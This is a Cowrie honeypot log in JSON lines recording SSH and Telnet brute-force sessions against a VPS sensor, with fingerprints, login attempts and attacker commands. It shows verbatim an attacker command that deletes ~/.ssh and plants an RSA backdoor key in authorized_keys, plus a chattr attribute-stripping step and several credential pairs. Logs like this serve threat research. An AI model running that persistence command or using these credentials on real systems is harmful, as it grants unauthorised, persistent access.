{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:32:38.583102Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:32:38.854482Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:38.855548Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57978,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d22dd6ea949","protocol":"ssh","message":"New connection: 212.227.235.229:57978 (1.2.3.4:22) [session: 7d22dd6ea949]","sensor":"my-vps","timestamp":"2025-09-09T01:32:39.113579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:32:39.114495Z","src_ip":"212.227.235.229","session":"7d22dd6ea949"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:32:39.373476Z","src_ip":"212.227.235.229","session":"7d22dd6ea949"}
{"eventid":"cowrie.session.closed","duration":3.000657081604004,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:40.117015Z","src_ip":"212.227.125.160","session":"1c9b111c1d6c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52078,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a73f933742b","protocol":"ssh","message":"New connection: 217.72.205.35:52078 (1.2.3.4:22) [session: 2a73f933742b]","sensor":"my-vps","timestamp":"2025-09-09T01:32:40.170229Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:40.171345Z","src_ip":"217.72.205.35","session":"2a73f933742b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:32:40.449718Z","src_ip":"212.227.235.229","session":"7d22dd6ea949"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:41.710943Z","src_ip":"212.227.235.229","session":"7d22dd6ea949"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57986,"dst_ip":"1.2.3.4","dst_port":22,"session":"77040eb307a5","protocol":"ssh","message":"New connection: 212.227.235.229:57986 (1.2.3.4:22) [session: 77040eb307a5]","sensor":"my-vps","timestamp":"2025-09-09T01:32:41.981469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:32:41.983029Z","src_ip":"212.227.235.229","session":"77040eb307a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:32:42.254775Z","src_ip":"212.227.235.229","session":"77040eb307a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59208,"dst_ip":"1.2.3.4","dst_port":23,"session":"63bd8613c2d7","protocol":"telnet","message":"New connection: 212.227.125.160:59208 (1.2.3.4:23) [session: 63bd8613c2d7]","sensor":"my-vps","timestamp":"2025-09-09T01:32:43.226824Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:32:43.379703Z","src_ip":"212.227.235.229","session":"77040eb307a5"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:43.651633Z","src_ip":"212.227.235.229","session":"29055b2b2be8"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:43.652835Z","src_ip":"212.227.235.229","session":"77040eb307a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46482,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c0940e3eda6","protocol":"ssh","message":"New connection: 212.227.235.229:46482 (1.2.3.4:22) [session: 3c0940e3eda6]","sensor":"my-vps","timestamp":"2025-09-09T01:32:44.094765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:32:44.096491Z","src_ip":"212.227.235.229","session":"3c0940e3eda6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:32:44.325512Z","src_ip":"212.227.235.229","session":"3c0940e3eda6"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"!","message":"login attempt [administrator/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:32:45.283171Z","src_ip":"212.227.235.229","session":"3c0940e3eda6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49238,"dst_ip":"1.2.3.4","dst_port":22,"session":"0287ffb06858","protocol":"ssh","message":"New connection: 212.227.235.229:49238 (1.2.3.4:22) [session: 0287ffb06858]","sensor":"my-vps","timestamp":"2025-09-09T01:32:46.472413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:32:46.473808Z","src_ip":"212.227.235.229","session":"0287ffb06858"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:46.514493Z","src_ip":"212.227.235.229","session":"3c0940e3eda6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:32:46.708178Z","src_ip":"212.227.235.229","session":"0287ffb06858"}
{"eventid":"cowrie.login.failed","username":"tom","password":"1234567","message":"login attempt [tom/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T01:32:47.643123Z","src_ip":"212.227.235.229","session":"0287ffb06858"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:48.881542Z","src_ip":"212.227.235.229","session":"0287ffb06858"}
{"eventid":"cowrie.session.closed","duration":10.012713432312012,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:53.239451Z","src_ip":"212.227.125.160","session":"63bd8613c2d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40114,"dst_ip":"1.2.3.4","dst_port":22,"session":"05e09ab8b2fe","protocol":"ssh","message":"New connection: 212.227.235.229:40114 (1.2.3.4:22) [session: 05e09ab8b2fe]","sensor":"my-vps","timestamp":"2025-09-09T01:32:55.736637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:32:55.737495Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:32:55.854747Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.login.success","username":"root","password":"*^rkd@#dkwl@!","message":"login attempt [root/*^rkd@#dkwl@!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:32:56.365758Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:56.620933Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:32:56.621658Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:32:56.622798Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:56.741176Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:32:57.079045Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:32:57.079746Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:32:57.199764Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:57.200651Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40118,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c9755b80bc5","protocol":"ssh","message":"New connection: 212.227.235.229:40118 (1.2.3.4:22) [session: 8c9755b80bc5]","sensor":"my-vps","timestamp":"2025-09-09T01:32:57.318163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:32:57.318978Z","src_ip":"212.227.235.229","session":"8c9755b80bc5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:32:57.437516Z","src_ip":"212.227.235.229","session":"8c9755b80bc5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:32:57.951867Z","src_ip":"212.227.235.229","session":"8c9755b80bc5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:59.072469Z","src_ip":"212.227.235.229","session":"8c9755b80bc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40128,"dst_ip":"1.2.3.4","dst_port":22,"session":"e03bf6286848","protocol":"ssh","message":"New connection: 212.227.235.229:40128 (1.2.3.4:22) [session: e03bf6286848]","sensor":"my-vps","timestamp":"2025-09-09T01:32:59.193167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:32:59.193824Z","src_ip":"212.227.235.229","session":"e03bf6286848"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:32:59.315097Z","src_ip":"212.227.235.229","session":"e03bf6286848"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:32:59.841972Z","src_ip":"212.227.235.229","session":"e03bf6286848"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:59.962199Z","src_ip":"212.227.235.229","session":"05e09ab8b2fe"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:32:59.964209Z","src_ip":"212.227.235.229","session":"e03bf6286848"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43986,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a42a325358b","protocol":"ssh","message":"New connection: 212.227.235.229:43986 (1.2.3.4:22) [session: 2a42a325358b]","sensor":"my-vps","timestamp":"2025-09-09T01:33:04.632211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:33:04.633290Z","src_ip":"212.227.235.229","session":"2a42a325358b"}
